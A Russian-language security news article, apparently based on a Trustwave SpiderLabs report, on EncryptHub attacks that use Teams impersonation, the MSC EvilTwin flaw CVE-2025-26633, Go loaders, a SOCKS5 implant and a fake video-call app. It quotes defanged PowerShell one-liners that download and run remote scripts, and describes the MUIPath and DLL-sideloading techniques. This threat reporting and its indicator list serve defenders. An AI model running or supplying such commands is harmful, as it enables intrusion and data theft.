Приняли звонок в Teams? Поздравляем, троян уже в системе — с правами выше, чем у вас

Исследовательская команда Trustwave SpiderLabs зафиксировала новую волну атак EncryptHub, где человеческий фактор и эксплуатация уязвимости в Microsoft Management Console сходятся в одном сценарии. Операторы представляются сотрудниками службы поддержки, выходят на связь через Microsoft Teams , убеждают «клиента» открыть удалённый доступ и выполнить набор команд, а затем разворачивают полезную нагрузку через брешь CVE-2025-26633, известную как MSC EvilTwin. Параллельно группа использует нестандартные каналы доставки, в том числе площадку Brave Support, что усложняет фильтрацию трафика и анализ происшествий. В сводках фигурируют и другие имена этой же команды — LARVA-208 и Water Gamayun; ранее она уже «засвечивалась» на атаках против разработчиков Web3 и злоупотреблении платформой Steam, а по состоянию на февраль речь шла о 618 скомпрометированных организациях по всему миру.

Первый шаг — социальная инженерия . Жертве прилетает запрос в Teams от «айтишника», после чего собеседник настойчиво предлагает поднять удалённый сеанс и «проверить настройки». Как только сессия установлена, на машине выполняется строка вида: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://cjhsbam[.]com/payload/runner.ps1' | Invoke-Expression". Этот вызов подгружает и исполняет скрипт runner.ps1, который подготавливает плацдарм для задействования MMC-уязвимости.

Дальше в ход идёт трюк с двойниками .msc. Загрузчик создаёт два файла консоли с одинаковым именем: «чистый» экземпляр кладётся в ожидаемую директорию, а вредоносный — в путь MUIPath, обычно каталог en-US. При запуске легитимной оснастки появляется процесс mmc.exe, и из-за дефекта MSC EvilTwin он в первую очередь ищет одноимённый файл в MUIPath. В итоге система подхватывает «зеркало» из en-US и исполняет код злоумышленников. Хотя брешь как нулевой день публично описали в марте 2025 года, образцы таких файлов встречались «в природе» уже в феврале; патч существует, но на не обновлённых станциях приём работает до сих пор.

После выкладки двойников runner.ps1 правит содержимое вредоносной оснастки: плейсхолдер htmlLoaderUrl заменяется на адрес командно-контрольного узла EncryptHub — строку вида hxxps://cjhsbam[.]com/payload/build[.]ps1. Получив ссылку, .msc тянет следующий этап. Скрипт build.ps1 собирает «пальчики» системы и отправляет их на C2, прописывает механизм автозапуска, держит канал связи и ждёт задачи. Команды поступают в зашифрованном виде (AES), расшифровываются локально и исполняются напрямую на узле через Invoke-Expression. Среди типовых модулей — PowerShell-вор Fickle Stealer; он выгребает чувствительные файлы, сведения о среде и данные криптокошельков.

В ходе разбирательства всплыли дополнительные инструменты на Go, которыми операторы постепенно заменяют сценарии на PowerShell. Один из таких — SilentCrystal — повторяет логику загрузчика, но упакован в нативный бинарник. Сначала создаётся псевдосистемная папка "C:\Windows \System32" с пробелом после слова Windows, что визуально копирует настоящий каталог и путает защитные средства. Затем образец отправляет POST на управляющий сервер с жёстко прошитым «API-ключом» и случайным названием файла с расширением .zip; в ответ приходит легитимная ссылка на Brave Support. Обычным новичкам на этой площадке заливать вложения нельзя, значит у EncryptHub имеется аккаунт с правами загрузки. Архив с Brave Support скачивается, распаковывается, после чего в WF.msc заменяется плейсхолдер {URI} на адрес командного центра. Далее запускается штатная .msc, и, благодаря CVE-2025-26633 , консоль подхватывает подмену из «ложной» директории, выполняя нужный код.

Отдельная находка — «прокси-закладка» на Go с поддержкой SOCKS5. Без параметров она стартует как клиент, соединяется с «хостингом» злоумышленников по зашитым в бинарь реквизитам и уводит трафик в туннель. Есть и серверный режим: загружается файл с данными для аутентификации, автоматически генерируется самоподписанный TLS-сертификат (в поле Common Name стоит строка Reverse Socks, в DNS-имени — localhost), после чего процесс начинает принимать множественные подключения, распараллеливая обработку через горутины. При установлении связи агент уходит в Telegram со статусом о «старте», куда подставляет имя пользователя, домен из переменной окружения USERDOMAIN, результат проверки административных прав через вызов net session, а также публичный IP, геометку и провайдера по запросу к https://ipinfo.io/json . Анализ инфраструктуры показывал обращения за полезной нагрузкой по адресу hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1 — ещё один кирпичик в картине C2.

Помимо «официального» хостинга на компрометированных ресурсах группа задействует поддельные сервисы видеозвонков. Выявлен домен api.rivatalk.net, связанный с новым командным сервером; верхний домен rivatalk.net зарегистрировали в конце июля 2025 года и оформили как «платформу» с настольным приложением под Windows и веб-клиентом. Скачивание EXE/Msi требует код доступа — фильтр против случайных исследователей и песочниц. При вводе корректной комбинации на машину попадает setup.msi, который раскладывает файлы, среди них launcher.exe и бинарник Symantec Early Launch Anti-Malware; последний используется для побочной загрузки поддельной userenv.dll. Подменённая библиотека запускает команду вида: cmd /c powershell -nop -w hidden -c $wc=New-Object Net.WebClient;iex $wc.DownloadString('hxxps://api.rivatalk[.]net/meta/pay[.]ps1'). Загруженный скрипт рисует правдоподобное окно «System Configuration», чтобы отвлечь внимание, а в фоновом режиме поднимает задачу, генерирующую фальшивый веб-трафик через частые HTTP-обращения к популярным сайтам — на фоне этого «шума» пакеты к C2 теряются в общей массе. Далее берётся UUID устройства, поддерживается непрерывный обмен с сервером управления, приказы поступают в AES-обёртке и исполняются на ходу через Invoke-Expression, что даёт оператору полный контроль над системой.

Картина в целом выглядит цельной: уговор по телефону, Teams-сеанс, однострочник PowerShell, двойные .msc и MUIPath-подмена, связка из build.ps1 и Fickle Stealer, «голанговые» загрузчики и SOCKS5-туннели, маскировка под поддержку Brave и фальшивые видеозвонки. Такой конвейер рассчитан на то, чтобы обойти защитные барьеры, зацепиться в сети и вести операции под прикрытием привычных процессов. Патч для CVE-2025-26633 уже выпущен, но EncryptHub продолжает атаковать забывчивых — там, где обновления не доставлены или политики позволяют запускать неподписанные сценарии, шансы на успешный взлом по-прежнему высоки.

Индикаторы компрометации, по наблюдениям SpiderLabs, включают домены и адреса: rivatalk[.]net, 0daydreams[.]net, cjhsbam[.]com, safesurf.fastdomain-uoemathhvq.workers[.]dev, 185.33.86.220. Эти метки пересекаются с описанной выше инфраструктурой — Brave Support-ссылками, Cloudflare Workers-узлом для выдачи PowerShell-кода и «видеоплатформой» RivaTalk, которая раздаёт setup.msi только по приглашению.